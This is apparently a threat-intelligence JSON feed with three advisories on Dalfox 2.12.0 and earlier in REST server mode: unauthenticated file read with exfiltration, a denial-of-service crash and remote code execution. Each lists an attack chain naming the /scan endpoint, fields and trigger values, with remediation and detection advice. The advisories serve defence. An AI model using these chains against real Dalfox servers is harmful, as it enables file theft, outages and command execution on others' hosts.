{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/dalfox/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["dalfox/v2"],"_cs_severities":["high"],"_cs_tags":["unauthenticated-access","file-read","ghsa"],"_cs_type":"advisory","_cs_vendors":["GitHub"],"content_html":"\u003cp\u003eDalfox, when run in REST API server mode, is vulnerable to an unauthenticated arbitrary file read. The \u003ccode\u003ecustom-payload-file\u003c/code\u003e field in \u003ccode\u003emodel.Options\u003c/code\u003e is deserialized from the request body and used to read files. An attacker can exploit this by sending a POST request to the \u003ccode\u003e/scan\u003c/code\u003e endpoint with a \u003ccode\u003ecustom-payload-file\u003c/code\u003e parameter pointing to a file on the server. Dalfox then reads the file line by line and includes each line as a payload in outbound HTTP requests directed at an attacker-controlled target URL. This vulnerability exists because the server, by default, does not require an API key. This allows an unauthenticated network attacker to exfiltrate the contents of arbitrary files readable by the dalfox process. The affected version is dalfox/v2 \u0026lt;= 2.12.0.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker sends a POST request to the \u003ccode\u003e/scan\u003c/code\u003e endpoint of the Dalfox REST API server (typically running on \u003ccode\u003e0.0.0.0:6664\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe request includes a JSON body with the \u003ccode\u003eurl\u003c/code\u003e, \u003ccode\u003eoptions\u003c/code\u003e, \u003ccode\u003ecustom-payload-file\u003c/code\u003e, \u003ccode\u003eskip-discovery\u003c/code\u003e, and \u003ccode\u003eparam\u003c/code\u003e fields set.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecustom-payload-file\u003c/code\u003e field contains the path to the file the attacker wants to read (e.g., \u003ccode\u003e/etc/hostname\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eskip-discovery\u003c/code\u003e option is set to \u003ccode\u003etrue\u003c/code\u003e, and \u003ccode\u003eparam\u003c/code\u003e is set to \u003ccode\u003e[\u0026quot;q\u0026quot;]\u003c/code\u003e to bypass checks.\u003c/li\u003e\n\u003cli\u003eDalfox reads the specified file line by line using \u003ccode\u003evoltFile.ReadLinesOrLiteral\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEach line of the file is embedded as the value of the \u003ccode\u003eq\u003c/code\u003e query parameter in a GET request to the attacker-controlled URL.\u003c/li\u003e\n\u003cli\u003eDalfox sends the HTTP GET request to the attacker\u0026rsquo;s server, exfiltrating one line of the file.\u003c/li\u003e\n\u003cli\u003eThe attacker receives the file content via the query parameter of the HTTP GET request.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows an attacker to read arbitrary files on the Dalfox host that the Dalfox process has access to. This includes sensitive data like SSH private keys, TLS certificates, \u003ccode\u003e.env\u003c/code\u003e files containing credentials, cloud credential files, and system configuration files. If combined with other vulnerabilities, such as the \u003ccode\u003efound-action\u003c/code\u003e RCE, the attacker could potentially gain full control of the server.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement the preferred remediation: Apply a denylist of fields that should never be accepted from the REST API, as suggested in the source, to prevent attackers from abusing \u003ccode\u003eCustomPayloadFile\u003c/code\u003e and other sensitive parameters.\u003c/li\u003e\n\u003cli\u003eRequire the \u003ccode\u003e--api-key\u003c/code\u003e flag at server startup, as suggested in the source, to mandate authentication for all API requests.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Dalfox Unauthenticated File Read via API\u003c/code\u003e to detect attempts to exploit this vulnerability by monitoring HTTP POST requests to the \u003ccode\u003e/scan\u003c/code\u003e endpoint with a \u003ccode\u003ecustom-payload-file\u003c/code\u003e parameter.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-12T15:11:08Z","date_published":"2026-05-12T15:11:08Z","id":"https://feed.craftedsignal.io/briefs/2026-05-dalfox-file-read/","summary":"Dalfox server mode is vulnerable to an unauthenticated arbitrary file read with out-of-band exfiltration via the `custom-payload-file` parameter, allowing attackers to read sensitive files on the host.","title":"Dalfox Server Mode Unauthenticated Arbitrary File Read","url":"https://feed.craftedsignal.io/briefs/2026-05-dalfox-file-read/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["dalfox"],"_cs_severities":["medium"],"_cs_tags":["dos","vulnerability","dalfox"],"_cs_type":"advisory","_cs_vendors":["github.com"],"content_html":"\u003cp\u003eDalfox, a security tool, is susceptible to an unauthenticated remote denial-of-service vulnerability (CVE-2026-45090) within its \u003ccode\u003eParameterAnalysis\u003c/code\u003e function. This vulnerability arises from a two-stage worker design where the second stage inadvertently utilizes a closed channel from the first stage. When a scanned parameter is reflected during the second stage of the analysis and \u003ccode\u003eprocessParams\u003c/code\u003e attempts to write to this already-closed channel, it triggers a Go runtime panic, resulting in the termination of the entire Dalfox process in server mode. This can be exploited remotely by any unauthenticated caller with network access to the Dalfox REST API, as the default configuration lacks an API key and the second stage activates whenever \u003ccode\u003eoptions.Data != \u0026quot;\u0026quot;\u003c/code\u003e (i.e., the attacker supplies the \u003ccode\u003edata\u003c/code\u003e field) and the target reflects at least one parameter. This issue affects Dalfox versions 2.12.0 and earlier.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker sends a POST request to the \u003ccode\u003e/scan\u003c/code\u003e endpoint of the Dalfox REST API server.\u003c/li\u003e\n\u003cli\u003eThe attacker includes a \u003ccode\u003eurl\u003c/code\u003e parameter pointing to a controlled, reflective HTTP server (e.g., \u003ccode\u003ehttp://127.0.0.1:18083/?q=test\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker includes a JSON payload containing \u003ccode\u003eoptions\u003c/code\u003e with \u003ccode\u003e\u0026quot;data\u0026quot;: \u0026quot;q=test\u0026quot;\u003c/code\u003e, \u003ccode\u003e\u0026quot;mining-dict\u0026quot;: true\u003c/code\u003e, and \u003ccode\u003e\u0026quot;use-headless\u0026quot;: false\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eoptions.Data\u003c/code\u003e value triggers the activation of the second worker stage in \u003ccode\u003eParameterAnalysis\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003emining-dict: true\u003c/code\u003e setting populates the POST-body parameter map (\u003ccode\u003edp\u003c/code\u003e) with numerous entries from the GF-XSS wordlist.\u003c/li\u003e\n\u003cli\u003eThe target server reflects the \u003ccode\u003eq\u003c/code\u003e parameter, causing the \u003ccode\u003evrs\u003c/code\u003e variable to evaluate to true within the \u003ccode\u003eprocessParams\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eprocessParams\u003c/code\u003e attempts to send a \u003ccode\u003eparamResult\u003c/code\u003e to the closed \u003ccode\u003eresults\u003c/code\u003e channel: \u003ccode\u003eresults \u0026lt;- paramResult\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThis operation triggers a Go runtime panic because the \u003ccode\u003eresults\u003c/code\u003e channel was already closed after the first stage of \u003ccode\u003eParameterAnalysis\u003c/code\u003e, causing the Dalfox server process to crash.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful exploit results in a complete crash of the Dalfox server process upon receiving a single unauthenticated POST request. This leads to the loss of any in-flight scan results, and requires a manual restart of the server. If Dalfox is managed by an automated process manager (such as systemd or Docker with \u003ccode\u003e--restart=always\u003c/code\u003e), this vulnerability can lead to a denial-of-service loop, as the server will repeatedly crash and restart upon receiving malicious requests. The attack requires network access to port 6664 (the default Dalfox API port) and a reflective HTTP server accessible to the Dalfox instance.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the suggested fix (Option 1) by allocating a fresh \u003ccode\u003eresults\u003c/code\u003e channel for the second stage within the \u003ccode\u003eParameterAnalysis\u003c/code\u003e function to prevent writing to a closed channel.\u003c/li\u003e\n\u003cli\u003eAs a temporary measure, implement Option 3 and add a \u003ccode\u003erecover\u003c/code\u003e statement in the \u003ccode\u003eprocessParams\u003c/code\u003e goroutines to catch the panic and prevent the process from crashing while a proper fix is deployed.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Dalfox DoS Attack via /scan Endpoint\u0026rdquo; to detect POST requests to the \u003ccode\u003e/scan\u003c/code\u003e endpoint with the specific \u003ccode\u003eoptions\u003c/code\u003e payload that triggers the vulnerability.\u003c/li\u003e\n\u003cli\u003eMonitor Dalfox server logs for \u0026ldquo;panic: send on closed channel\u0026rdquo; messages originating from \u003ccode\u003epkg/scanning/parameterAnalysis.go:299\u003c/code\u003e, which indicates a successful exploit of CVE-2026-45090.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-12T15:10:28Z","date_published":"2026-05-12T15:10:28Z","id":"https://feed.craftedsignal.io/briefs/2026-05-dalfox-dos/","summary":"Dalfox is vulnerable to an unauthenticated remote denial-of-service (DoS) vulnerability (CVE-2026-45090) due to a closed channel write in the `ParameterAnalysis` function, triggered by a crafted POST request that crashes the Dalfox server process.","title":"Dalfox Unauthenticated Remote DoS via Closed-Channel Write in ParameterAnalysis","url":"https://feed.craftedsignal.io/briefs/2026-05-dalfox-dos/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["dalfox/v2 (\u003c= 2.12.0)"],"_cs_severities":["critical"],"_cs_tags":["rce","dalfox","cve-2026-45087"],"_cs_type":"advisory","_cs_vendors":["Hahwul"],"content_html":"\u003cp\u003eDalfox, a security auditing tool, is vulnerable to unauthenticated remote code execution (CVE-2026-45087) when running in REST API server mode (\u003ccode\u003edalfox server\u003c/code\u003e) with default settings. The server binds to \u003ccode\u003e0.0.0.0:6664\u003c/code\u003e and, unless explicitly configured with \u003ccode\u003e--api-key\u003c/code\u003e, does not require authentication. A flaw exists in how the server handles \u003ccode\u003emodel.Options\u003c/code\u003e, specifically \u003ccode\u003eFoundAction\u003c/code\u003e and \u003ccode\u003eFoundActionShell\u003c/code\u003e, which are deserialized directly from attacker-supplied JSON in \u003ccode\u003ePOST /scan\u003c/code\u003e. Because \u003ccode\u003edalfox.Initialize\u003c/code\u003e propagates these fields into the final scan options without sanitization, any unauthenticated attacker can execute arbitrary shell commands on the host OS whenever a scan finding is triggered. This vulnerability affects dalfox versions 2.12.0 and earlier.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker starts a \u003ccode\u003edalfox server\u003c/code\u003e instance in REST API mode without specifying an API key, leaving it open to unauthenticated access.\u003c/li\u003e\n\u003cli\u003eThe attacker sets up a malicious web server that reflects input, ensuring any scan against it will produce a finding.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a \u003ccode\u003ePOST\u003c/code\u003e request to the \u003ccode\u003e/scan\u003c/code\u003e endpoint of the dalfox server.\u003c/li\u003e\n\u003cli\u003eThe request includes a JSON payload containing the URL of the malicious web server and \u003ccode\u003eoptions\u003c/code\u003e with malicious values for \u003ccode\u003efound-action\u003c/code\u003e and \u003ccode\u003efound-action-shell\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003epostScanHandler\u003c/code\u003e deserializes the JSON payload into a \u003ccode\u003eReq\u003c/code\u003e struct, including the \u003ccode\u003eoptions\u003c/code\u003e field which contains the malicious \u003ccode\u003eFoundAction\u003c/code\u003e and \u003ccode\u003eFoundActionShell\u003c/code\u003e values.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eScanFromAPI\u003c/code\u003e function is called, passing the attacker-controlled options to \u003ccode\u003edalfox.Initialize\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edalfox.Initialize\u003c/code\u003e copies the attacker-supplied \u003ccode\u003eFoundAction\u003c/code\u003e and \u003ccode\u003eFoundActionShell\u003c/code\u003e values into the scan options without sanitization.\u003c/li\u003e\n\u003cli\u003eWhen a finding is triggered during the scan, the \u003ccode\u003efoundAction\u003c/code\u003e function executes the attacker-supplied shell command using \u003ccode\u003eexec.Command\u003c/code\u003e, achieving remote code execution on the dalfox host.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation results in unauthenticated remote code execution on the host running \u003ccode\u003edalfox server\u003c/code\u003e. This grants the attacker full read access to secrets, configuration files, and credentials accessible to the dalfox process. The attacker can perform arbitrary file writes, enabling persistence, backdoor installation, and data exfiltration. The default \u003ccode\u003e0.0.0.0\u003c/code\u003e bind address exposes the server to all network interfaces, potentially including public-facing ones in misconfigured environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRequire API key:\u003c/strong\u003e Enforce the use of \u003ccode\u003e--api-key\u003c/code\u003e in REST server mode by rejecting server startup if no API key is provided, as described in the remediation suggestion within the advisory.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eStrip \u003ccode\u003eFoundAction\u003c/code\u003e / \u003ccode\u003eFoundActionShell\u003c/code\u003e:\u003c/strong\u003e Sanitize API-sourced requests by removing the \u003ccode\u003eFoundAction\u003c/code\u003e and \u003ccode\u003eFoundActionShell\u003c/code\u003e options in the \u003ccode\u003epostScanHandler\u003c/code\u003e to prevent untrusted callers from setting execution-control options.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDeploy the Sigma rules:\u003c/strong\u003e Deploy the provided Sigma rules to your SIEM and tune them for your environment to detect exploitation attempts.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUpgrade Dalfox:\u003c/strong\u003e Upgrade to a patched version of Dalfox that addresses CVE-2026-45087.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-12T15:10:12Z","date_published":"2026-05-12T15:10:12Z","id":"https://feed.craftedsignal.io/briefs/2026-05-dalfox-rce/","summary":"Dalfox in REST API server mode is vulnerable to unauthenticated remote code execution (CVE-2026-45087) because the server binds to 0.0.0.0:6664 by default without requiring an API key and deserializes attacker-supplied JSON in `POST /scan` without stripping the `FoundAction` and `FoundActionShell` fields, allowing arbitrary command execution.","title":"Dalfox Server Mode Vulnerable to Unauthenticated Remote Code Execution via `found-action`","url":"https://feed.craftedsignal.io/briefs/2026-05-dalfox-rce/"}],"language":"en","title":"CraftedSignal Threat Feed — Dalfox","version":"https://jsonfeed.org/version/1.1"}